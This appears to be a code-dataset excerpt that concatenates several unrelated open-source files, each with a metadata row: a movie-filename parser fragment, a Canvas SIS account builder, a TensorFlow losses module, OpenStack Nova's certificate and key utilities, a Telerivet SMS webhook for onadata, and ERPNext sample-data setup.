# "Breaking.Bad.S05E10.Buried.HDTV.XviD-AFG.avi",
# "Breaking.Bad.S05E10.Buried.720p.HDTV.x264-AFG.mkv", #Incorrectly nonHD
# "Dexter.S08E08.HDTV.XviD-AFG.avi",
# "Dexter.S08E07.1080p.HDTV.x264-QCF.mkv",
# "Dexter S08E07 720p HDTV x264-QCF.mkv",
# "The.Great.Gatsby.2013.BluRay.1080p.DTS.x264-CHD.mkv", #Incorrectly nonHD
# "The Forbidden Girl 2013 BRRIP Xvid AC3-BHRG.avi",
# "Pain.&.Gain.2013.720p.BluRay.DD5.1.x264-HiDt.mkv",
# "Band.of.Brothers.S01E02.Day.of.Days.DVDRip.XviD-AC3-BAGS.avi",
# "Dexter.S08E06.PROPER.720p.HDTV.x264-IMMERSE.mkv", #Incorrectly nonHD
# "Dexter S08E06 PROPER 720p HDTV x264-IMMERSE.mkv", #Incorrectly nonHD
# "10.Things.I.Hate.About.You.1999.720p.BluRay.x264-SiNNERS.mkv",
# "101.Dalmatians.1961.1080p.BluRay.X264-AMIABLE.mkv",
# "101.Dalmatians.1961.1080p.BluRay.X264-AMIABLE.sub",
# "[email protected]",
# "2.Guns.2013.1080p.BluRay.DTS.x264-HDMaNiAcS.mkv",
# "28 Days Later... 2002 1080p DTS multisub HighCode.mkv",
# "28 Days Later... 2002 1080p DTS multisub HighCode.mp4",
# "28 Weeks Later 2007 BDRip 1080p DTS multisub HighCode.mkv"]
class Movies():
l = []
def __init__(self):
pass
def addMovie(self, title,year,quality, extension):
newm = MovieClass(title,year,quality, extension)
self.l.append(newm)
def to_JSON(self):
output = "[";
for movie in self.l:
movStr = movie.to_JSON() + '\n'
output += movStr + ","
output = output[:-1]
output += "]";
return output
class MovieClass():
title = ""
year = ""
quality = ""
extension =""
def __init__(self, title,year,quality, extension):
self.title = title.title().strip();
self.year = year.strip();
self.quality = quality.strip();
self.extension = extension.strip().lower();
def to_JSON(self):
str = "\"title\": \"{0.title}\", \"year\": \"{0.year}\", \"quality\": \"{0.quality}\", \"extension\": \"{0.extension}\"".format(self)
return "{" + str + "}"
#a_file = open('rand2.txt','w')
myMovies = Movies()
for name in onlyfiles:
movie = re.findall(r"""(.*?[ .]) # Title
(\d{4}) # Year
[ .a-zA-Z]* # Space, period, or words
(\d{3,4}p)? # Quality
(.*) # Space, period, or words
(\.\w{3,4}) #Extension
""", name, re.VERBOSE)
if len(movie) > 0:
#a_file.write("Title: "+movie[0][0].replace(".", " ") + "\n")
#a_file.write("Year: "+movie[0][1].replace(".", " ") + "\n")
#a_file.write("Quality: "+(movie[0][2]+'\n' if len(movie[0][1])>0 else
#"Unknown\n"))
myMovies.addMovie(movie[0][0].replace(".", " "), movie[0][1].replace(".", " "), (movie[0][2]), movie[0][4])
else:
movie = re.findall(r"""(.*) # Title
(\.\w{3,4}) #Extension
""", name, re.VERBOSE)
myMovies.addMovie(movie[0][0].replace(".", " "), "", "", movie[0][1])
#a_file.write("error")
with open(outputpath, 'w') as outfile:
outfile.write(myMovies.to_JSON())
#outfile.write(oneLine)
#print(myMovies.to_JSON())
#a_file.close()
| mit | 2,350,329,632,189,715,000 | 37.37963 | 141 | 0.593245 | false |
uw-it-aca/canvas-sis-provisioner | sis_provisioner/builders/accounts.py | 1 | 2563 | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from sis_provisioner.builders import Builder
from sis_provisioner.models.account import Curriculum
from sis_provisioner.csv.format import AccountCSV
from sis_provisioner.dao.account import (
get_all_campuses, get_all_colleges, get_curricula_by_department,
get_departments_by_college, account_sis_id, account_name)
from django.conf import settings
class AccountBuilder(Builder):
"""
Generates the data for all sub-accounts found for the current
term. Sub-account hierarchy is root account, campus, college,
department, curriculum.
"""
def build(self, **kwargs):
root_id = getattr(settings, 'SIS_IMPORT_ROOT_ACCOUNT_ID', None)
for campus in get_all_campuses():
campus_id = account_sis_id([root_id, campus.label])
self.data.add(AccountCSV(campus_id, root_id, campus))
for college in get_all_colleges():
college_id = account_sis_id([root_id, college.campus_label,
college.name])
campus_id = account_sis_id([root_id, college.campus_label])
self.data.add(AccountCSV(college_id, campus_id, college))
for department in get_departments_by_college(college):
dept_id = account_sis_id([root_id, college.campus_label,
college.name, department.label])
self.data.add(AccountCSV(dept_id, college_id, department))
for curriculum in get_curricula_by_department(
department, future_terms=2, view_unpublished=True):
curr_id = account_sis_id([root_id, college.campus_label,
college.name, department.label,
curriculum.label])
if self.data.add(AccountCSV(curr_id, dept_id, curriculum)):
# Update the Curriculum model for this curriculum
try:
model = Curriculum.objects.get(
curriculum_abbr=curriculum.label)
except Curriculum.DoesNotExist:
model = Curriculum(
curriculum_abbr=curriculum.label)
model.full_name = account_name(curriculum)
model.subaccount_id = curr_id
model.save()
return self._write()
| apache-2.0 | -199,273,288,973,789,730 | 43.964912 | 79 | 0.569645 | false |
admcrae/tensorflow | tensorflow/contrib/losses/__init__.py | 23 | 1205 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for building neural network losses.
See @{$python/contrib.losses}.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.contrib.losses.python import losses
from tensorflow.contrib.losses.python.losses import *
# pylint: enable=unused-import,wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__, doc_string_modules=[losses])
| apache-2.0 | -6,667,677,021,512,173,000 | 37.870968 | 80 | 0.721992 | false |
Francis-Liu/animated-broccoli | nova/crypto.py | 14 | 14437 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Wrappers around standard crypto data elements.
Includes root and intermediate CAs, SSH key_pairs and x509 certificates.
"""
from __future__ import absolute_import
import base64
import binascii
import os
from cryptography import exceptions
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography import x509
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import fileutils
from oslo_utils import timeutils
import paramiko
import six
from nova import context
from nova import db
from nova import exception
from nova.i18n import _, _LE
from nova import paths
from nova import utils
LOG = logging.getLogger(__name__)
crypto_opts = [
cfg.StrOpt('ca_file',
default='cacert.pem',
help=_('Filename of root CA')),
cfg.StrOpt('key_file',
default=os.path.join('private', 'cakey.pem'),
help=_('Filename of private key')),
cfg.StrOpt('crl_file',
default='crl.pem',
help=_('Filename of root Certificate Revocation List')),
cfg.StrOpt('keys_path',
default=paths.state_path_def('keys'),
help=_('Where we keep our keys')),
cfg.StrOpt('ca_path',
default=paths.state_path_def('CA'),
help=_('Where we keep our root CA')),
cfg.BoolOpt('use_project_ca',
default=False,
help=_('Should we use a CA for each project?')),
cfg.StrOpt('user_cert_subject',
default='/C=US/ST=California/O=OpenStack/'
'OU=NovaDev/CN=%.16s-%.16s-%s',
help=_('Subject for certificate for users, %s for '
'project, user, timestamp')),
cfg.StrOpt('project_cert_subject',
default='/C=US/ST=California/O=OpenStack/'
'OU=NovaDev/CN=project-ca-%.16s-%s',
help=_('Subject for certificate for projects, %s for '
'project, timestamp')),
]
CONF = cfg.CONF
CONF.register_opts(crypto_opts)
def ca_folder(project_id=None):
if CONF.use_project_ca and project_id:
return os.path.join(CONF.ca_path, 'projects', project_id)
return CONF.ca_path
def ca_path(project_id=None):
return os.path.join(ca_folder(project_id), CONF.ca_file)
def key_path(project_id=None):
return os.path.join(ca_folder(project_id), CONF.key_file)
def crl_path(project_id=None):
return os.path.join(ca_folder(project_id), CONF.crl_file)
def fetch_ca(project_id=None):
if not CONF.use_project_ca:
project_id = None
ca_file_path = ca_path(project_id)
if not os.path.exists(ca_file_path):
raise exception.CryptoCAFileNotFound(project=project_id)
with open(ca_file_path, 'r') as cafile:
return cafile.read()
def ensure_ca_filesystem():
"""Ensure the CA filesystem exists."""
ca_dir = ca_folder()
if not os.path.exists(ca_path()):
genrootca_sh_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'CA', 'genrootca.sh'))
fileutils.ensure_tree(ca_dir)
utils.execute("sh", genrootca_sh_path, cwd=ca_dir)
def generate_fingerprint(public_key):
try:
pub_bytes = public_key.encode('utf-8')
# Test that the given public_key string is a proper ssh key. The
# returned object is unused since pyca/cryptography does not have a
# fingerprint method.
serialization.load_ssh_public_key(
pub_bytes, backends.default_backend())
pub_data = base64.b64decode(public_key.split(' ')[1])
digest = hashes.Hash(hashes.MD5(), backends.default_backend())
digest.update(pub_data)
md5hash = digest.finalize()
raw_fp = binascii.hexlify(md5hash)
if six.PY3:
raw_fp = raw_fp.decode('ascii')
return ':'.join(a + b for a, b in zip(raw_fp[::2], raw_fp[1::2]))
except Exception:
raise exception.InvalidKeypair(
reason=_('failed to generate fingerprint'))
def generate_x509_fingerprint(pem_key):
try:
if isinstance(pem_key, six.text_type):
pem_key = pem_key.encode('utf-8')
cert = x509.load_pem_x509_certificate(
pem_key, backends.default_backend())
raw_fp = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
if six.PY3:
raw_fp = raw_fp.decode('ascii')
return ':'.join(a + b for a, b in zip(raw_fp[::2], raw_fp[1::2]))
except (ValueError, TypeError, binascii.Error) as ex:
raise exception.InvalidKeypair(
reason=_('failed to generate X509 fingerprint. '
'Error message: %s') % ex)
def generate_key_pair(bits=2048):
key = paramiko.RSAKey.generate(bits)
keyout = six.StringIO()
key.write_private_key(keyout)
private_key = keyout.getvalue()
public_key = '%s %s Generated-by-Nova' % (key.get_name(), key.get_base64())
fingerprint = generate_fingerprint(public_key)
return (private_key, public_key, fingerprint)
def fetch_crl(project_id):
"""Get crl file for project."""
if not CONF.use_project_ca:
project_id = None
crl_file_path = crl_path(project_id)
if not os.path.exists(crl_file_path):
raise exception.CryptoCRLFileNotFound(project=project_id)
with open(crl_file_path, 'r') as crlfile:
return crlfile.read()
def decrypt_text(project_id, text):
private_key_file = key_path(project_id)
if not os.path.exists(private_key_file):
raise exception.ProjectNotFound(project_id=project_id)
with open(private_key_file, 'rb') as f:
data = f.read()
try:
priv_key = serialization.load_pem_private_key(
data, None, backends.default_backend())
return priv_key.decrypt(text, padding.PKCS1v15())
except (ValueError, TypeError, exceptions.UnsupportedAlgorithm) as exc:
raise exception.DecryptionFailure(reason=six.text_type(exc))
def ssh_encrypt_text(ssh_public_key, text):
"""Encrypt text with an ssh public key.
If text is a Unicode string, encode it to UTF-8.
"""
if isinstance(text, six.text_type):
text = text.encode('utf-8')
try:
pub_bytes = ssh_public_key.encode('utf-8')
pub_key = serialization.load_ssh_public_key(
pub_bytes, backends.default_backend())
return pub_key.encrypt(text, padding.PKCS1v15())
except Exception as exc:
raise exception.EncryptionFailure(reason=six.text_type(exc))
def revoke_cert(project_id, file_name):
"""Revoke a cert by file name."""
try:
# NOTE(vish): potential race condition here
utils.execute('openssl', 'ca', '-config', './openssl.cnf', '-revoke',
file_name, cwd=ca_folder(project_id))
utils.execute('openssl', 'ca', '-gencrl', '-config', './openssl.cnf',
'-out', CONF.crl_file, cwd=ca_folder(project_id))
except OSError:
raise exception.ProjectNotFound(project_id=project_id)
except processutils.ProcessExecutionError:
raise exception.RevokeCertFailure(project_id=project_id)
def revoke_certs_by_user(user_id):
"""Revoke all user certs."""
admin = context.get_admin_context()
for cert in db.certificate_get_all_by_user(admin, user_id):
revoke_cert(cert['project_id'], cert['file_name'])
def revoke_certs_by_project(project_id):
"""Revoke all project certs."""
# NOTE(vish): This is somewhat useless because we can just shut down
# the vpn.
admin = context.get_admin_context()
for cert in db.certificate_get_all_by_project(admin, project_id):
revoke_cert(cert['project_id'], cert['file_name'])
def revoke_certs_by_user_and_project(user_id, project_id):
"""Revoke certs for user in project."""
admin = context.get_admin_context()
for cert in db.certificate_get_all_by_user_and_project(admin,
user_id, project_id):
revoke_cert(cert['project_id'], cert['file_name'])
def _project_cert_subject(project_id):
"""Helper to generate user cert subject."""
return CONF.project_cert_subject % (project_id, timeutils.isotime())
def _user_cert_subject(user_id, project_id):
"""Helper to generate user cert subject."""
return CONF.user_cert_subject % (project_id, user_id, timeutils.isotime())
def generate_x509_cert(user_id, project_id, bits=2048):
"""Generate and sign a cert for user in project."""
subject = _user_cert_subject(user_id, project_id)
with utils.tempdir() as tmpdir:
keyfile = os.path.abspath(os.path.join(tmpdir, 'temp.key'))
csrfile = os.path.abspath(os.path.join(tmpdir, 'temp.csr'))
utils.execute('openssl', 'genrsa', '-out', keyfile, str(bits))
utils.execute('openssl', 'req', '-new', '-key', keyfile, '-out',
csrfile, '-batch', '-subj', subject)
with open(keyfile) as f:
private_key = f.read()
with open(csrfile) as f:
csr = f.read()
(serial, signed_csr) = sign_csr(csr, project_id)
fname = os.path.join(ca_folder(project_id), 'newcerts/%s.pem' % serial)
cert = {'user_id': user_id,
'project_id': project_id,
'file_name': fname}
db.certificate_create(context.get_admin_context(), cert)
return (private_key, signed_csr)
def generate_winrm_x509_cert(user_id, bits=2048):
"""Generate a cert for passwordless auth for user in project."""
subject = '/CN=%s' % user_id
upn = '%s@localhost' % user_id
with utils.tempdir() as tmpdir:
keyfile = os.path.abspath(os.path.join(tmpdir, 'temp.key'))
conffile = os.path.abspath(os.path.join(tmpdir, 'temp.conf'))
_create_x509_openssl_config(conffile, upn)
(certificate, _err) = utils.execute(
'openssl', 'req', '-x509', '-nodes', '-days', '3650',
'-config', conffile, '-newkey', 'rsa:%s' % bits,
'-outform', 'PEM', '-keyout', keyfile, '-subj', subject,
'-extensions', 'v3_req_client',
binary=True)
(out, _err) = utils.execute('openssl', 'pkcs12', '-export',
'-inkey', keyfile, '-password', 'pass:',
process_input=certificate,
binary=True)
private_key = base64.b64encode(out)
fingerprint = generate_x509_fingerprint(certificate)
if six.PY3:
private_key = private_key.decode('ascii')
certificate = certificate.decode('utf-8')
return (private_key, certificate, fingerprint)
def _create_x509_openssl_config(conffile, upn):
content = ("distinguished_name = req_distinguished_name\n"
"[req_distinguished_name]\n"
"[v3_req_client]\n"
"extendedKeyUsage = clientAuth\n"
"subjectAltName = otherName:""1.3.6.1.4.1.311.20.2.3;UTF8:%s\n")
with open(conffile, 'w') as file:
file.write(content % upn)
def _ensure_project_folder(project_id):
if not os.path.exists(ca_path(project_id)):
geninter_sh_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'CA', 'geninter.sh'))
utils.execute('sh', geninter_sh_path, project_id,
_project_cert_subject(project_id), cwd=ca_folder())
def generate_vpn_files(project_id):
project_folder = ca_folder(project_id)
key_fn = os.path.join(project_folder, 'server.key')
crt_fn = os.path.join(project_folder, 'server.crt')
if os.path.exists(crt_fn):
return
# NOTE(vish): The 2048 is to maintain compatibility with the old script.
# We are using "project-vpn" as the user_id for the cert
# even though that user may not really exist. Ultimately
# this will be changed to be launched by a real user. At
# that point we will can delete this helper method.
key, csr = generate_x509_cert('project-vpn', project_id, 2048)
with open(key_fn, 'w') as keyfile:
keyfile.write(key)
with open(crt_fn, 'w') as crtfile:
crtfile.write(csr)
def sign_csr(csr_text, project_id=None):
if not CONF.use_project_ca:
project_id = None
if not project_id:
return _sign_csr(csr_text, ca_folder())
_ensure_project_folder(project_id)
return _sign_csr(csr_text, ca_folder(project_id))
def _sign_csr(csr_text, ca_folder):
with utils.tempdir() as tmpdir:
inbound = os.path.join(tmpdir, 'inbound.csr')
outbound = os.path.join(tmpdir, 'outbound.csr')
try:
with open(inbound, 'w') as csrfile:
csrfile.write(csr_text)
except IOError:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed to write inbound.csr'))
LOG.debug('Flags path: %s', ca_folder)
# Change working dir to CA
fileutils.ensure_tree(ca_folder)
utils.execute('openssl', 'ca', '-batch', '-out', outbound, '-config',
'./openssl.cnf', '-infiles', inbound, cwd=ca_folder)
out, _err = utils.execute('openssl', 'x509', '-in', outbound,
'-serial', '-noout', cwd=ca_folder)
serial = out.rpartition('=')[2].strip()
with open(outbound, 'r') as crtfile:
return (serial, crtfile.read())
| apache-2.0 | -945,007,648,203,035,300 | 36.017949 | 79 | 0.619935 | false |
eHealthAfrica/onadata | onadata/apps/sms_support/providers/telerivet.py | 2 | 3908 | """ Telerivet WebHook gateway
Supports Receiving and replying SMS from/to Telerivet Service
See: http://telerivet.com/help/api/webhook/receiving """
import json
import datetime
from django.http import HttpResponse
from django.core.urlresolvers import reverse
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from django.utils.translation import ugettext as _
from onadata.apps.sms_support.tools import SMS_API_ERROR,\
SMS_SUBMISSION_ACCEPTED
from onadata.apps.sms_support.parser import process_incoming_smses
def autodoc(url_root, username, id_string):
urla = url_root + reverse('sms_submission_api',
kwargs={'username': username,
'service': 'telerivet'})
urlb = url_root + reverse('sms_submission_form_api',
kwargs={'username': username,
'id_string': id_string,
'service': 'telerivet'})
doc = (u'<p>' +
_(u"%(service)s Instructions:")
% {'service': u'<a href="https://telerivet.com">'
u'Telerivet\'s Webhook API</a>'}
+ u'</p><ol><li>' +
_(u"Sign in to Telerivet.com and go to Service Page.")
+ u'</li><li>' +
_(u"Follow instructions to add an application with either URL:")
+ u'<br /><span class="sms_autodoc_example">%(urla)s'
+ u'<br />%(urlb)s</span><br />'
+ u'</li></ol><p>' +
_(u"That's it. Now Send an SMS Formhub submission to your Telerivet"
u" phone number. It will create a submission on Formhub.")
+ u'</p>') % {'urla': urla, 'urlb': urlb}
return doc
def get_response(data):
message = data.get('text')
if data.get('code') == SMS_API_ERROR:
message = None
elif data.get('code') != SMS_SUBMISSION_ACCEPTED:
message = _(u"[ERROR] %s") % message
response = {}
if message:
response.update({"messages": [{"content": message}]})
return HttpResponse(json.dumps(response), mimetype='application/json')
@require_POST
@csrf_exempt
def import_submission(request, username):
""" Proxy to import_submission_for_form with None as id_string """
return import_submission_for_form(request, username, None)
@require_POST
@csrf_exempt
def import_submission_for_form(request, username, id_string):
""" Retrieve and process submission from SMSSync Request """
sms_identity = request.POST.get('from_number', '').strip()
sms_text = request.POST.get('content', '').strip()
now_timestamp = datetime.datetime.now().strftime('%s')
sent_timestamp = request.POST.get('time_created', now_timestamp).strip()
try:
sms_time = datetime.datetime.fromtimestamp(float(sent_timestamp))
except ValueError:
sms_time = datetime.datetime.now()
return process_message_for_telerivet(username=username,
sms_identity=sms_identity,
sms_text=sms_text,
sms_time=sms_time,
id_string=id_string)
def process_message_for_telerivet(username,
sms_identity, sms_text, sms_time, id_string):
""" Process a text instance and return in SMSSync expected format """
if not sms_identity or not sms_text:
return get_response({'code': SMS_API_ERROR,
'text': _(u"`identity` and `message` are "
u"both required and must not be "
u"empty.")})
incomings = [(sms_identity, sms_text)]
response = process_incoming_smses(username, incomings, id_string)[-1]
return get_response(response)
| bsd-2-clause | 6,995,010,597,197,296,000 | 36.576923 | 79 | 0.577021 | false |
ebukoz/thrive | erpnext/setup/setup_wizard/operations/sample_data.py | 9 | 4547 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils.make_random import add_random_children
import frappe.utils
import random, os, json
from frappe import _
def make_sample_data(domains, make_dependent = False):
"""Create a few opportunities, quotes, material requests, issues, todos, projects
to help the user get started"""
if make_dependent:
items = frappe.get_all("Item", {'is_sales_item': 1})
customers = frappe.get_all("Customer")
warehouses = frappe.get_all("Warehouse")
if items and customers:
for i in range(3):
customer = random.choice(customers).name
make_opportunity(items, customer)
make_quote(items, customer)
if items and warehouses:
make_material_request(frappe.get_all("Item"))
make_projects(domains)
import_notification()
def make_opportunity(items, customer):
b = frappe.get_doc({
"doctype": "Opportunity",
"opportunity_from": "Customer",
"customer": customer,
"opportunity_type": _("Sales"),
"with_items": 1
})
add_random_children(b, "items", rows=len(items), randomize = {
"qty": (1, 5),
"item_code": ["Item"]
}, unique="item_code")
b.insert(ignore_permissions=True)
b.add_comment('Comment', text="This is a dummy record")
def make_quote(items, customer):
qtn = frappe.get_doc({
"doctype": "Quotation",
"quotation_to": "Customer",
"party_name": customer,
"order_type": "Sales"
})
add_random_children(qtn, "items", rows=len(items), randomize = {
"qty": (1, 5),
"item_code": ["Item"]
}, unique="item_code")
qtn.insert(ignore_permissions=True)
qtn.add_comment('Comment', text="This is a dummy record")
def make_material_request(items):
for i in items:
mr = frappe.get_doc({
"doctype": "Material Request",
"material_request_type": "Purchase",
"schedule_date": frappe.utils.add_days(frappe.utils.nowdate(), 7),
"items": [{
"schedule_date": frappe.utils.add_days(frappe.utils.nowdate(), 7),
"item_code": i.name,
"qty": 10
}]
})
mr.insert()
mr.submit()
mr.add_comment('Comment', text="This is a dummy record")
def make_issue():
pass
def make_projects(domains):
current_date = frappe.utils.nowdate()
project = frappe.get_doc({
"doctype": "Project",
"project_name": "ERPNext Implementation",
})
tasks = [
{
"title": "Explore ERPNext",
"start_date": current_date,
"end_date": current_date,
"file": "explore.md"
}]
if 'Education' in domains:
tasks += [
{
"title": _("Setup your Institute in ERPNext"),
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 1),
"file": "education_masters.md"
},
{
"title": "Setup Master Data",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 1),
"file": "education_masters.md"
}]
else:
tasks += [
{
"title": "Setup Your Company",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 1),
"file": "masters.md"
},
{
"title": "Start Tracking your Sales",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 2),
"file": "sales.md"
},
{
"title": "Start Managing Purchases",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 3),
"file": "purchase.md"
},
{
"title": "Import Data",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 4),
"file": "import_data.md"
},
{
"title": "Go Live!",
"start_date": current_date,
"end_date": frappe.utils.add_days(current_date, 5),
"file": "go_live.md"
}]
for t in tasks:
with open (os.path.join(os.path.dirname(__file__), "tasks", t['file'])) as f:
t['description'] = frappe.utils.md_to_html(f.read())
del t['file']
project.append('tasks', t)
project.insert(ignore_permissions=True)
def import_notification():
'''Import notification for task start'''
with open (os.path.join(os.path.dirname(__file__), "tasks/task_alert.json")) as f:
notification = frappe.get_doc(json.loads(f.read())[0])
notification.insert()
# trigger the first message!
from frappe.email.doctype.notification.notification import trigger_daily_alerts
trigger_daily_alerts()
def test_sample():
frappe.db.sql('delete from `tabNotification`')
frappe.db.sql('delete from tabProject')
frappe.db.sql('delete from tabTask')
make_projects('Education')
import_notification() | gpl-3.0 | 4,250,881,906,569,239,600 | 24.840909 | 83 | 0.653398 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.